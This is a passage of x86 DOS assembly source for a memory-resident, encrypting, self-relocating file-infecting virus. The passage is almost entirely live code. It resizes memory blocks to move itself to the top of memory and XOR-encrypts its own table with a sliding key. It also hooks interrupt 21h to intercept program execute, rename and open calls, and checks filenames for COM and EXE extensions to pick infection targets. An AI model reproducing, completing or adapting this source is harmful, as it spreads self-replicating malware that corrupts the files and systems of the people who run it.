stack + + db 01h ; One byte instruction + + push si ; Save SI at stack + + db 03h ; Three bytes instruction + + mov si,1000h ; SI = offset of block information + + db 04h ; Four bytes instruction + + mov cx,ds:[04h] ; CX = offset of end of block info... + + db 02h ; Two bytes instruction + + sub cx,si ; Subtract offset of block informa... + + db 02h ; Two bytes instruction + + shr cx,01h ; Divide number of block by two + + db 02h ; Two bytes instruction + + shr cx,01h ; Divide number of block by two + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bcch ; Pointer to find_block__ + db 11101111b ; End of block +find_block__ db 11101110b ; Beginning of block + dw 0bcch ; Block identification of find_blo... + db 03h ; Three bytes instruction + + cmp ax,[si+02h] ; Found block? + + db 01110100b+10000000b ; Equal? Jump to found_bloc + dw 0bcdh ; Pointer to found_bloc + db 03h ; Three bytes instruction + + add si,04h ; SI = offset of next block in table + + db 01h ; One byte instruction + + dec cx ; Decrease counter + + db 01110101b+10000000b ; Not zero? Jump to find_block__ + dw 0bcch ; Pointer to find_block__ + db 11101111b ; End of block +found_bloc db 11101110b ; Beginning of block + dw 0bcdh ; Block identification of found_bloc + db 02h ; Two bytes instruction + + mov dx,[si] ; DX = offset of block + + db 01h ; One byte instruction + + pop si ; Load SI from stack + + db 01h ; One byte instruction + + pop cx ; Load CX from stack + + db 01h ; One byte instruction + + pop bx ; Load BX from stack (AX) + + db 02h ; Two bytes instruction + + mov al,[bx] ; AL = first byte of instruction + + db 02h ; Two bytes instruction + + cmp al,11110000b ; Jump condition? + + db 01110010b+10000000b ; Below? Jump to sto_call_j + dw 0bcfh ; Pointer to sto_call_j + db 03h ; Three bytes instruction + + sub byte ptr [bx],10000000b + + db 01h ; One byte instruction + + inc bx ; BX = offset of 8-bit immediate + + db 01h ; One byte instruction + + push dx ; Save DX at stack + + db 02h ; Two bytes instruction + + sub dx,bx ; Subtract offset within next viru... + + db 01h ; One byte instruction + + dec dx ; Decrease 8-bit immediate + + db 03h ; Three bytes instruction + + cmp dx,7fh ; 8-bit immediate out of range? + + db 01111111b+10000000b ; Greater? Jump to invert_jcc_ + dw 0bceh ; Pointer to invert_jcc_ + db 03h ; Three bytes instruction + + cmp dx,0ff80h ; 8-bit immediate out of range? + + db 01111100b+10000000b ; Less? Jump to invert_jcc_ + dw 0bceh ; Pointer to invert_jcc_ + db 02h ; Two bytes instruction + + mov [bx],dl ; Store 8-bit immediate + + db 01h ; One byte instruction + + inc bx ; BX = offset of end of Jcc imm8 + + db 04h ; Four bytes instruction + + mov [bx],1001000010010000b + + db 04h ; Four bytes instruction + + mov byte ptr [bx+02h],10010000b + + db 01h ; One byte instruction + + pop dx ; Load DX from stack + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bd0h ; Pointer to correc_i16_ + db 11101111b ; End of block +invert_jcc_ db 11101110b ; Beginning of block + dw 0bceh ; Block identification of invert_jcc_ + db 01h ; One byte instruction + + pop dx ; Load DX from stack + + db 01h ; One byte instruction + + dec bx ; BX = offset of Jcc imm8 + + db 03h ; Three bytes instruction + + xor byte ptr [bx],00000001b + + db 01h ; One byte instruction + + inc bx ; BX = offset of 8-bit immediate + + db 03h ; Three bytes instruction + + mov byte ptr [bx],03h ; Store 8-bit immediate + + db 01h ; One byte instruction + + inc bx ; BX = offset of JMP imm16 + + db 02h ; Two bytes instruction + + mov al,11101001b ; JMP imm16 (opcode 0e9h) + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bcfh ; Pointer to sto_call_j + db 11101111b ; End of block +sto_call_j db 11101110b ; Beginning of block + dw 0bcfh ; Block identification of sto_call... + db 02h ; Two bytes instruction + + mov [bx],al ; Store CALL imm16; JMP imm16 + + db 01h ; One byte instruction + + inc bx ; BX = offset of 16-bit immediate + + db 02h ; Two bytes instruction + + sub dx,bx ; Subtract offset within next viru... + + db 01h ; One byte instruction + + dec dx ; Decrease 16-bit immediate + + db 01h ; One byte instruction + + dec dx ; Decrease 16-bit immediate + + db 02h ; Two bytes instruction + + mov [bx],dx ; Store 16-bit immediate + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bd0h ; Pointer to correc_i16_ + db 11101111b ; End of block +correc_i16_ db 11101110b ; Beginning of block + dw 0bd0h ; Block identification of correc_... + db 01h ; One byte instruction + + dec cx ; Decrease counter + + db 01110101b+10000000b ; Not zero? Jump to jmp_call_lo + dw 0bcbh ; Pointer to jmp_call_lo + db 03h ; Three bytes instruction + + mov si,3000h ; SI = offset of data information + + db 04h ; Four bytes instruction + + mov cx,ds:[08h] ; CX = offset of end of data infor... + + db 02h ; Two bytes instruction + + sub cx,si ; Subtract offset of data informat... + + db 02h ; Two bytes instruction + + shr cx,01h ; Divide number of data references... + + db 02h ; Two bytes instruction + + shr cx,01h ; Divide number of data references... + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bd1h ; Pointer to data_ref_lo + db 11101111b ; End of block +data_ref_lo db 11101110b ; Beginning of block + dw 0bd1h ; Block identification of data_ref_lo + db 01h ; One byte instruction + + lodsw ; AX = offset of block within data... + + db 01h ; One byte instruction + + push ax ; Save AX at stack + + db 01h ; One byte instruction + + lodsw ; AX = offset of block within data... + + db 01h ; One byte instruction + + push cx ; Save CX at stack + + db 01h ; One byte instruction + + push si ; Save SI at stack + + db 03h ; Three bytes instruction + + mov si,1000h ; SI = offset of block information + + db 04h ; Four bytes instruction + + mov cx,ds:[04h] ; CX = offset of end of block info... + + db 02h ; Two bytes instruction + + sub cx,si ; Subtract offset of block informa... + + db 02h ; Two bytes instruction + + shr cx,01h ; Divide number of block by two + + db 02h ; Two bytes instruction + + shr cx,01h ; Divide number of block by two + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bd2h ; Pointer to find_bloc + db 11101111b ; End of block +find_bloc db 11101110b ; Beginning of block + dw 0bd2h ; Block identification to find_bloc + db 03h ; Three bytes instruction + + cmp ax,[si+02h] ; Found block? + + db 01110100b+10000000b ; Equal? Jump to found_bloc_ + dw 0bd3h ; Pointer to found_bloc_ + db 03h ; Three bytes instruction + + add si,04h ; SI = offset of next block in table + + db 01h ; One byte instruction + + dec cx ; Decrease counter + + db 01110101b+10000000b ; Not zero? Jump to find_bloc + dw 0bd2h ; Pointer to find_bloc + db 11101111b ; End of block +found_bloc_ db 11101110b ; Beginning of block + dw 0bd3h ; Block identification of found_bloc_ + db 02h ; Two bytes instruction + + mov ax,[si] ; AX = offset of block + + db 01h ; One byte instruction + + pop si ; Load SI from stack + + db 01h ; One byte instruction + + pop cx ; Load CX from stack + + db 01h ; One byte instruction + + pop bx ; Load BX from stack (AX) + + db 03h ; Three bytes instruction + + sub ax,4000h ; Subtract offset of next virus ge... + + db 02h ; Two bytes instruction + + mov [bx],ax ; Store 16-bit immediate + + db 01h ; One byte instruction + + dec cx ; Decrease counter + + db 01110101b+10000000b ; Not zero? Jump to data_ref_lo + dw 0bd1h ; Pointer to data_ref_lo + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 1772h ; Pointer to restore_cod + db 11101111b ; End of block +restore_cod db 11101110b ; Beginning of block + dw 1772h ; Block identification of restore_... + db 04h ; Four bytes instruction + + mov ax,[bp+1234h] ; AX = segment of PSP for current ... + + db 11101101b ; Data reference + dw 0befh ; Pointer to program_seg_ + db 04h ; Four bytes instruction + + mov cx,[bp+1234h] ; CX = initial SS relative to star... + + db 11101101b ; Data reference + dw 138ah ; Pointer to initial_ss_ + db 03h ; Three bytes instruction + + add cx,10h ; Add ten to initial SS relative t... + + db 02h ; Two bytes instruction + + add cx,ax ; Add segment of PSP for current p... + + db 01h ; One byte instruction + + push cx ; Save CX at stack + + db 04h ; Four bytes instruction + + push [bp+1234h] ; Save initial SP at stack + + db 11101101b ; Data reference + dw 138ch ; Pointer to initial_sp_ + db 04h ; Four bytes instruction + + mov cx,[bp+1234h] ; CX = initial CS relative to star... + + db 11101101b ; Data reference + dw 1389h ; Pointer to initial_cs_ + db 03h ; Three bytes instruction + + add cx,10h ; Add ten to initial CS relative t... + + db 02h ; Two bytes instruction + + add cx,ax ; Add segment of PSP for current p... + + db 01h ; One byte instruction + + push cx ; Save CX at stack + + db 04h ; Four bytes instruction + + push [bp+1234h] ; Save initial IP at stack + + db 11101101b ; Data reference + dw 138bh ; Pointer to initial_ip_ + db 01h ; One byte instruction + + push ax ; Save segment of PSP for current ... + + db 04h ; Four bytes instruction + + push [bp+1234h] ; Save size of memory block in par... + + db 11101101b ; Data reference + dw 1395h ; Pointer to mcb_size__ + db 01h ; One byte instruction + + push ds ; Save DS at stack + + db 02h ; Two bytes instruction + + mov cl,00h ; COM executable + + db 04h ; Four bytes instruction + + cmp [bp+1234h],cl ; COM executable? + + db 11101101b ; Data reference + dw 1388h ; Pointer to executa_sta + db 01110101b+10000000b ; Not equal? Jump to move_virus__ + dw 1390h ; Pointer to move_virus__ + db 04h ; Four bytes instruction + + lea si,[bp+1234h] ; SI = offset of origin_code_ + + db 11101101b ; Data reference + dw 1f40h ; Pointer to origin_code_ + db 03h ; Three bytes instruction + + mov ax,cs:[si] ; AX = first two bytes of original... + + db 04h ; Four bytes instruction + + mov cs:[100h],ax ; Store first two bytes of origina... + + db 04h ; Four bytes instruction + + mov al,cs:[si+02h] ; AL = last byte of original code ... + + db 04h ; Four bytes instruction + + mov cs:[100h+02h],al ; Store last byte of original code... + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 1390h ; Pointer to move_virus__ + db 11101111b ; End of block + db 11101110b ; Beginning of block + dw 1774h + db 04h ; Four bytes instruction + + mov ax,[bp+1234h] ; AX = segment of PSP for current ... + + db 11101101b ; Data reference + dw 0befh ; Pointer to program_seg_ + db 04h ; Four bytes instruction + + mov cx,[bp+1234h] ; CX = initial SS relative to star... + + db 11101101b ; Data reference + dw 138ah ; Pointer to initial_ss_ + db 03h ; Three bytes instruction + + add cx,10h ; Add ten to initial SS relative t... + + db 02h ; Two bytes instruction + + add cx,ax ; Add segment of PSP for current p... + + db 01h ; One byte instruction + + push cx ; Save CX at stack + + db 04h ; Four bytes instruction + + push [bp+1234h] ; Save initial SP at stack + + db 11101101b ; Data reference + dw 138ch ; Pointer to initial_sp_ + db 04h ; Four bytes instruction + + mov cx,[bp+1234h] ; CX = initial CS relative to star... + + db 11101101b ; Data reference + dw 1389h ; Pointer to initial_cs_ + db 03h ; Three bytes instruction + + add cx,10h ; Add ten to initial CS relative t... + + db 02h ; Two bytes instruction + + add cx,ax ; Add segment of PSP for current p... + + db 01h ; One byte instruction + + push cx ; Save CX at stack + + db 04h ; Four bytes instruction + + push [bp+1234h] ; Save incorrect IP at stack + + db 11101101b ; Data reference + dw 1773h ; Pointer to incorrec_ip + db 01h ; One byte instruction + + push ax ; Save segment of PSP for current ... + + db 04h ; Four bytes instruction + + push [bp+1234h] ; Save size of memory block in par... + + db 11101101b ; Data reference + dw 1395h ; Pointer to mcb_size__ + db 01h ; One byte instruction + + push ds ; Save DS at stack + + db 02h ; Two bytes instruction + + mov cl,00h ; COM executable + + db 04h ; Four bytes instruction + + cmp [bp+1234h],cl ; COM executable? + + db 11101101b ; Data reference + dw 1388h ; Pointer to executa_sta + db 01110101b+10000000b ; Not equal? Jump to move_virus__ + dw 1390h ; Pointer to move_virus__ + db 04h ; Four bytes instruction + + lea si,[bp+1234h] ; SI = offset of origin_code_ + + db 11101101b ; Data reference + dw 1f40h ; Pointer to origin_code_ + db 03h ; Three bytes instruction + + mov ax,cs:[si] ; AX = first two bytes of original... + + db 04h ; Four bytes instruction + + mov cs:[100h],ax ; Store first two bytes of origina... + + db 04h ; Four bytes instruction + + mov al,cs:[si+02h] ; AX = last byte of original code ... + + db 04h ; Four bytes instruction + + mov cs:[100h+02h],al ; Store last byte of original code... + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 1390h ; Pointer to move_virus__ + db 11101111b ; End of block +move_virus__ db 11101110b ; Beginning of block + dw 1390h ; Block identification of move_vir... + db 02h ; Two bytes instruction + + xor ax,ax ; Zero AX + + db 02h ; Two bytes instruction + + mov ds,ax ; DS = segment of DOS communicatio... + + db 05h ; Five bytes instruction + + cmp byte ptr ds:[501h],10h + + db 01110100b+10000000b ; Already resident? Jump to virus_... + dw 65h ; Pointer to virus_exit_ + db 05h ; Five bytes instruction + + mov byte ptr ds:[501h],10h + + db 01h ; One byte instruction + + push es ; Save ES at stack + + db 01h ; One byte instruction + + pop ds ; Load DS from stack (ES) + + db 03h ; Three bytes instruction + + mov ax,ds:[0ch] ; AX = offset within next virus ge... + + db 03h ; Three bytes instruction + + sub ax,4000h ; Subtract offset of next virus ge... + + db 04h ; Four bytes instruction + + mov [bp+1234h],ax ; Store offset of crypt_table + + db 11101101b ; Data reference + dw 0bf1h ; Pointer to vir_exit_of + db 04h ; Four bytes instruction + + mov cx,ds:[0eh] ; CX = length of virus + + db 04h ; Four bytes instruction + + mov [bp+1234h],cx ; Store length of virus + + db 11101101b ; Data reference + dw 0bf0h ; Pointer to virus_lengt + db 03h ; Three bytes instruction + + mov si,4000h ; SI = offset of next virus genera... + + db 02h ; Two bytes instruction + + xor di,di ; Zero DI + + db 02h ; Two bytes instruction + + rep movsb ; Move virus to top of memory + + db 02h ; Two bytes instruction + + mov cl,04h ; Divide by paragraphs + + db 02h ; Two bytes instruction + + shr di,cl ; DI = length of next virus genera... + + db 01h ; One byte instruction + + inc di ; Increase length of next virus ge... + + db 04h ; Four bytes instruction + + mov bx,[bp+1234h] ; BX = size of memory block in par... + + db 11101101b ; Data reference + dw 1394h ; Pointer to mcb_size___ + db 04h ; Four bytes instruction + + sub bx,[bp+1234h] ; Subtract new size in paragraphs ... + + db 11101101b ; Data reference + dw 1393h ; Pointer to new_mcb_siz + db 02h ; Two bytes instruction + + sub bx,di ; Subtract length of next virus ge... + + db 01h ; One byte instruction + + dec bx ; Decrease new size in paragraphs + + db 01h ; One byte instruction + + dec bx ; Decrease new size in paragraphs + + db 02h ; Two bytes instruction + + cmp bx,di ; Insufficient memory? + + db 01110010b+10000000b ; Below? Jump to virus_exit_ + dw 65h ; Pointer to virus_exit_ + db 02h ; Two bytes instruction + + mov ah,4ah ; Resize memory block + + db 02h ; Two bytes instruction + + int 21h + + db 01110010b+10000000b ; Error? Jump to virus_exit_ + dw 65h ; Pointer to virus_exit_ + db 02h ; Two bytes instruction + + mov bx,di ; BX = number of paragraphs to all... + + db 02h ; Two bytes instruction + + mov ah,48h ; Allocate memory + + db 02h ; Two bytes instruction + + int 21h + + db 01110010b+10000000b ; Error? Jump to virus_exit_ + dw 65h ; Pointer to virus_exit_ + db 01h ; One byte instruction + + push ax ; Save AX at stack + + db 01h ; One byte instruction + + dec ax ; AX = segment of current Memory C... + + db 02h ; Two bytes instruction + + mov es,ax ; ES = segment of current Memory C... + + db 07h ; Seven bytes instruction + + mov word ptr es:[01h],08h + + db 01h ; One byte instruction + + pop es ; Load ES from stack (AX) + + db 04h ; Four bytes instruction + + mov cx,[bp+1234h] ; CX = length of virus + + db 11101101b ; Data reference + dw 0bf0h ; Pointer to virus_lengt + db 02h ; Two bytes instruction + + xor si,si ; Zero SI + + db 02h ; Two bytes instruction + + xor di,di ; Zero DI + + db 02h ; Two bytes instruction + + rep movsb ; Move virus to top of memory + + db 01h ; One byte instruction + + push es ; Save ES at stack + + db 04h ; Four bytes instruction + + push [bp+1234h] ; Save offset of virus_exit_ at stack + + db 11101101b ; Data reference + dw 0bf1h ; Pointer to vir_exit_of + db 04h ; Four bytes instruction + + mov al,[bp+1234h] ; AL = 8-bit encryption/decryption... + + db 11101101b ; Data reference + dw 0bd7h ; Pointer to crypt_key_ + db 04h ; Four bytes instruction + + mov ah,[bp+1234h] ; AH = 8-bit sliding encrytion/dec... + + db 11101101b ; Data reference + dw 0bd8h ; Pointer to sliding_key_ + db 01h ; One byte instruction + + retf ; Return far + + db 11101111b ; End of block +terminate_ db 11101110b ; Beginning of block + dw 0beeh ; Block identification of terminate_ + db 03h ; Three bytes instruction + + mov ax,4c00h ; Terminate with return code + + db 02h ; Two bytes instruction + + int 21h + + db 11101111b ; End of block +get_rnd_num_ db 11101110b ; Beginning of block + dw 0bd4h ; Block identification of get_rnd_... + db 01h ; One byte instruction + + push cx ; Save CX at stack + + db 02h ; Two bytes instruction + + in al,40h ; AL = 8-bit random number + + db 02h ; Two bytes instruction + + mov ah,al ; AH = 8-bit random number + + db 02h ; Two bytes instruction + + in al,40h ; AL = 8-bit random number + + db 05h ; Five bytes instruction + + xor ax,es:[01h] ; AX = 16-bit random number + + db 02h ; Two bytes instruction + + mov cl,ah ; CL = high-order byte of 16-bit r... + + db 02h ; Two bytes instruction + + rol ax,cl ; AX = 16-bit random number + + db 04h ; Four bytes instruction + + mov es:[01h],ax ; Store 16-bit random number + + db 01h ; One byte instruction + + pop cx ; Load CX from stack + + db 01h ; One byte instruction + + ret ; Return + + db 11101111b ; End of block +rnd_in_rang db 11101110b ; Beginning of block + dw 0bd5h ; Block identification of rnd_in_rang + db 02h ; Two bytes instruction + + or bp,bp ; Zero BP? + + db 01110100b+10000000b ; Zero? Jump to zero_range_ + dw 0bd6h ; Pointer to zero_range_ + db 01h ; One byte instruction + + push dx ; Save DX at stack + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0bd4h ; Pointer to get_rnd_num_ + db 02h ; Two bytes instruction + + xor dx,dx ; Zero DX + + db 02h ; Two bytes instruction + + div bp ; DX = random number within range + + db 01h ; One byte instruction + + xchg ax,dx ; AX = random number within range + + db 01h ; One byte instruction + + pop dx ; Load DX from stack + + db 01h ; One byte instruction + + ret ; Return + + db 11101111b ; End of block +zero_range_ db 11101110b ; Beginning of block + dw 0bd6h ; Block identification of zero_range_ + db 02h ; Two bytes instruction + + xor ax,ax ; AX = random number within range + + db 01h ; One byte instruction + + ret ; Return + + db 11101111b ; End of block +decrypt_byt db 11101110b ; Beginning of block + dw 0be0h ; Block identification of decrypt_byt + db 04h ; Four bytes instruction + + mov [bp+1234h],ah ; Store AH + + db 11101101b ; Data reference + dw 0bd9h ; Pointer to ah__ + db 02h ; Two bytes instruction + + mov ax,si ; AX = offset within table + + db 02h ; Two bytes instruction + + sub ax,bp ; Subtract delta offset from offse... + + db 03h ; Three bytes instruction + + sub ax,1234h ; Subtract offset of tmc_table_ fr... + + db 11101101b ; Data reference + dw 4c5h ; Pointer to tmc_table_ + db 04h ; Four bytes instruction + + mul word ptr [bp+1234h] ; AL = 8-bit sliding encryptio... + + db 11101101b ; Data reference + dw 0bd8h ; Pointer to sliding_key_ + db 04h ; Four bytes instruction + + add al,[bp+1234h] ; AL = 8-bit encryption/decryption... + + db 11101101b ; Data reference + dw 0bd7h ; Pointer to crypt_key_ + db 02h ; Two bytes instruction + + xor al,[si] ; AL = byte of decrypted table + + db 04h ; Four bytes instruction + + mov ah,[bp+1234h] ; AH = stored AH + + db 11101101b ; Data reference + dw 0bd9h ; Pointer to ah__ + db 01h ; One byte instruction + + inc si ; Increase offset within table + + db 01h ; One byte instruction + + ret ; Return + + db 11101111b ; End of block +decrypt_id_ db 11101110b ; Beginning of block + dw 0be1h ; Block identification of decrypt_id_ + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0be0h ; Pointer to decrypt_byt + db 02h ; Two bytes instruction + + mov ah,al ; AL = byte of decrypted table + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0be0h ; Pointer to decrypt_byt + db 02h ; Two bytes instruction + + xchg al,ah ; AL = byte of decrypted table + + db 01h ; One byte instruction + + ret ; Return + + db 11101111b ; End of block +virus_exit_ db 11101110b ; Beginning of block + dw 65h ; Block identification of virus_exit_ + db 01h ; One byte instruction + + pop es ; Load ES from stack + + db 02h ; Two bytes instruction + + mov ah,49h ; Free memory + + db 02h ; Two bytes instruction + + int 21h + + db 01h ; One byte instruction + + pop bx ; Load BX from stack + + db 01h ; One byte instruction + + pop ax ; Load AX from stack + + db 02h ; Two bytes instruction + + mov ds,ax ; DS = segment of PSP for current ... + + db 02h ; Two bytes instruction + + mov es,ax ; DS = segment of PSP for current ... + + db 02h ; Two bytes instruction + + mov ah,4ah ; Resize memory block + + db 02h ; Two bytes instruction + + int 21h + + db 04h ; Four bytes instruction + + lea bx,[bp+1234h] ; BX = offset of jmp_imm32_ + + db 11101101b ; Data reference + dw 1391h ; Pointer of jmp_imm32_ + db 01h ; One byte instruction + + pop ax ; Load AX from stack (initial IP) + + db 04h ; Four bytes instruction + + mov cs:[bx+01h],ax ; Store initial IP + + db 01h ; One byte instruction + + pop ax ; Load AX from stack (initial CS ...) + + db 04h ; Four bytes instruction + + mov cs:[bx+03h],ax ; Store initial CS relative to sta... + + db 01h ; One byte instruction + + pop ax ; Load AX from stack (initial SP) + + db 01h ; One byte instruction + + pop ss ; Load SS from stack (initial SS ...) + + db 02h ; Two bytes instruction + + mov sp,ax ; SP = stack pointer + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 1391h ; Pointer of jmp_imm32_ + db 11101111b ; End of block +jmp_imm32_ db 11101110b ; Beginning of block + dw 1391h ; Block identification of jmp_imm32_ + db 05h+10h ; Five bytes data + db 11101010b ; JMP imm32 (opcode 0eah) + dd 00h ; Pointer to virus in top of memory + db 11101111b ; End of block +ah__ db 11101110b ; Beginning of block + dw 0bd9h ; Block identification of ah__ + db 01h+10h ; One byte data + db 00h ; Accumulator register (high-orde...) + db 11101111b ; End of block +probability_ db 11101110b ; Beginning of block + dw 0bech ; Block identification of probabil... + db 02h+10h ; Two bytes data + dw 32h ; Probability + db 11101111b ; End of block +crypt_key_ db 11101110b ; Beginning of block + dw 0bd7h ; Block identification of crypt_key_ + db 01h+10h ; One byte data + db 00h ; 8-bit encryption/decryption key + db 11101111b ; End of block +sliding_key_ db 11101110b ; Beginning of block + dw 0bd8h ; Block identification of sliding_... + db 02h+10h ; Two bytes data + dw 00h ; 8-bit sliding encryption/decrypt... + db 11101111b ; End of block +executa_sta db 11101110b ; Beginning of block + dw 1388h ; Block identification of executa_sta + db 01h+10h ; One byte data + db 00h ; Executable status + db 11101111b ; End of block +origin_code_ db 11101110b ; Beginning of block + dw 1f40h ; Block identification of origin_c... + db 03h+10h ; Three bytes data + db 11000011b,00000010b dup(00h) + db 11101111b ; End of block +initial_cs_ db 11101110b ; Beginning of block + dw 1389h ; Block identification of initial_cs_ + db 02h+10h ; Two bytes data + dw 0fff0h ; Initial CS relative to start of ... + db 11101111b ; End of block +initial_ss_ db 11101110b ; Beginning of block + dw 138ah ; Block identification of initial_ss_ + db 02h+10h ; Two bytes data + dw 0fff0h ; Initial SS relative to start of ... + db 11101111b ; End of block +initial_ip_ db 11101110b ; Beginning of block + dw 138bh ; Block identification of initial_ip_ + db 02h+10h ; Two bytes data + dw 100h ; Initial IP + db 11101111b ; End of block +incorrec_ip db 11101110b ; Beginning of block + dw 1773h ; Block identification of incorrec_ip + db 02h+10h ; Two bytes data + dw 100h ; Incorrect IP + db 11101111b ; End of block +initial_sp_ db 11101110b ; Beginning of block + dw 138ch ; Block identification of initial_sp_ + db 02h+10h ; Two bytes data + dw 0fffeh ; Initial SP + db 11101111b ; End of block +new_mcb_siz db 11101110b ; Beginning of block + dw 1393h ; Block identification of new_mcb_siz + db 02h+10h ; Two bytes data + dw 1000h ; New size in paragraphs + db 11101111b ; End of block +mcb_size__ db 11101110b ; Beginning of block + dw 1395h ; Block identification of mcb_size__ + db 02h+10h ; Two bytes data + dw 0ffffh ; Size of memory block in paragraphs + db 11101111b ; End of block +mcb_size___ db 11101110b ; Beginning of block + dw 1394h ; Block identification of mcb_siz... + db 02h+10h ; Two bytes data + dw 00h ; Size of memory block in paragraphs + db 11101111b ; End of block +program_seg_ db 11101110b ; Beginning of block + dw 0befh ; Block identification of program_... + db 02h+10h ; Two bytes data + dw 00h ; Segment of PSP for current process + db 11101111b ; End of block +virus_lengt db 11101110b ; Beginning of block + dw 0bf0h ; Block identification of virus_lengt + db 02h+10h ; Two bytes data + dw 00h ; Length of virus + db 11101111b ; End of block +vir_exit_of db 11101110b ; Beginning of block + dw 0bf1h ; Block identification of vir_exit_of + db 02h+10h ; Two bytes data + dw 00h ; Offset of virus_exit_ + db 11101111b ; End of block +tmc_table_ db 11101110b ; Beginning of block + dw 4c5h ; Block identification of tmc_table_ + db 11101111b ; End of block + db 00h ; End of table +second_table db 11101111b ; End of block +virus_end: +crypt_table db 11101110b ; Beginning of block + dw 66h ; Block identification of crypt_table + db 02h ; Two bytes instruction + + xor bp,bp ; BP = delta offset + + db 01h ; One byte instruction + + push cs ; Save CS at stack + + db 01h ; One byte instruction + + pop ds ; Load DS from stack + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0bfeh ; Pointer to crypt_table_ + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0bd4h ; Pointer to get_rnd_num_ + db 03h ; Three bytes instruction + + mov ds:[1234h],al ; Store 8-bit encryption/decryptio... + + db 11101101b ; Data reference + dw 0bd7h ; Pointer to crypt_key_ + db 04h ; Four bytes instruction + + mov ds:[1234h],ah ; Store 8-bit sliding encryption/d... + + db 11101101b ; Data reference + dw 0bd8h ; Pointer to sliding_key_ + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0bfeh ; Pointer to crypt_table_ + db 03h ; Three bytes instruction + + mov ax,3521h ; Get interrupt vector 21h + + db 02h ; Two bytes instruction + + int 21h + + db 03h ; Three bytes instruction + + mov di,1234h ; DI = offset of int21_jump + + db 11101101b ; Data reference + dw 0c9h ; Pointer to int21_jump + db 03h ; Three bytes instruction + + mov [di+01h],bx ; Store offset of interrupt 21h + + db 03h ; Three bytes instruction + + mov [di+03h],es ; Store segment of interrupt 21h + + db 03h ; Three bytes instruction + + mov dx,1234h ; DX = offset of int21_virus + + db 11101101b ; Data reference + dw 0c8h ; Pointer to int21_virus + db 03h ; Three bytes instruction + + mov ax,2521h ; Set interrupt vector 21h + + db 02h ; Two bytes instruction + + int 21h + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 65h ; Pointer to virus_exit_ + db 11101111b ; End of block +crypt_table_ db 11101110b ; Beginning of block + dw 0bfeh ; Block identification of crypt_ta... + db 03h ; Three bytes instruction + + mov si,1234h ; SI = offset of tmc_table_ + + db 11101101b ; Data reference + dw 4c5h ; Pointer to tmc_table_ + db 03h ; Three bytes instruction + + mov cx,(code_end-first_table) + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bffh ; Pointer to crypt_loop + db 11101111b ; End of block +crypt_loop db 11101110b ; Beginning of block + dw 0bffh ; Block identification of crypt_lo... + db 02h ; Two bytes instruction + + xor [si],al ; Encrypt byte of table + + db 01h ; One byte instruction + + inc si ; Increase offset within table + + db 02h ; Two bytes instruction + + add al,ah ; Add 8-bit sliding encryption key... + + db 01h ; One byte instruction + + dec cx ; Decrease counter + + db 01110101b+10000000b ; Not zero? Jump to crypt_loop + dw 0bffh ; Pointer to crypt_loop + db 01h ; One byte instruction + + ret ; Return + + db 11101111b ; End of block +int21_virus db 11101110b ; Beginning of block + dw 0c8h ; Block identification of int21_virus + db 01h ; One byte instruction + + push ax ; Save AX at stack + + db 01h ; One byte instruction + + push bx ; Save BX at stack + + db 01h ; One byte instruction + + push cx ; Save CX at stack + + db 01h ; One byte instruction + + push dx ; Save DX at stack + + db 01h ; One byte instruction + + push si ; Save SI at stack + + db 01h ; One byte instruction + + push di ; Save DI at stack + + db 01h ; One byte instruction + + push ds ; Save DS at stack + + db 01h ; One byte instruction + + push es ; Save ES at stack + + db 01h ; One byte instruction + + cld ; Clear direction flag + + db 03h ; Three bytes instruction + + cmp ah,4bh ; Load and/or execute program? + + db 01110100b+10000000b ; Equal? Jump to find_zero + dw 1392h ; Pointer to find_zero + db 03h ; Three bytes instruction + + cmp ah,56h ; Rename file? + + db 01110100b+10000000b ; Equal? Jump to find_zero + dw 1392h ; Pointer to find_zero + db 03h ; Three bytes instruction + + cmp ah,3dh ; Open file? + + db 01110101b+10000000b ; Not equal? Jump to int21_exit + dw 0fbh ; Pointer to int21_exit + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 1392h ; Pointer to find_zero + db 11101111b ; End of block +find_zero db 11101110b ; Beginning of block + dw 1392h ; Block identification of find_zero + db 01h ; One byte instruction + + push ds ; Save DS at stack + + db 01h ; One byte instruction + + pop es ; Load ES from stack (DS) + + db 02h ; Two bytes instruction + + mov di,dx ; DI = offset of filename + + db 03h ; Three bytes instruction + + mov cx,43h ; CX = number of bytes to search t... + + db 02h ; Two bytes instruction + + xor al,al ; Zero AL + + db 02h ; Two bytes instruction + + repne scasb ; Find end of filename + + db 01110101b+10000000b ; Not equal? Jump to int21_exit + dw 0fbh ; Pointer to int21_exit + db 03h ; Three bytes instruction + + lea si,[di-05h] ; SI = offset of the dot in the fi... + + db 01h ; One byte instruction + + lodsw ; AX = two bytes of filename + + db 03h ; Three bytes instruction + + or ax,2020h ; Lowercase characters + + db 03h ; Three bytes instruction + + mov bx,'mo' ; COM executable + + db 03h ; Three bytes instruction + + cmp ax,'c.' ; COM executable? + + db 01110100b+10000000b ; Equal? Jump to examine_ext + dw 0f0h ; Pointer to examine_ext + db 03h ; Three bytes instruction + + mov bx,'ex' ; EXE executable + + db 03h ; Three bytes instruction + + cmp ax,'e.' ; EXE executable? + + db 01110100b+10000000b ; Equal? Jump to examine_ext + dw 0f0h ; Pointer to examine_ext + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0fbh ; Pointer to int21_exit + db 11101111b ; End of block +examine_ext db 11101110b ; Beginning of block + dw 0f0h ; Block identification of examine_ext + db 01h ; One byte instruction + + lodsw ; AX = two bytes of filename + + db 03h ; Three bytes instruction + + or ax,2020h ; Lowercase characters + + db 02h ; Two bytes instruction + + cmp ax,bx ; COM or EXE executable? + + db 01110101b+10000000b ; Not equal? Jump to 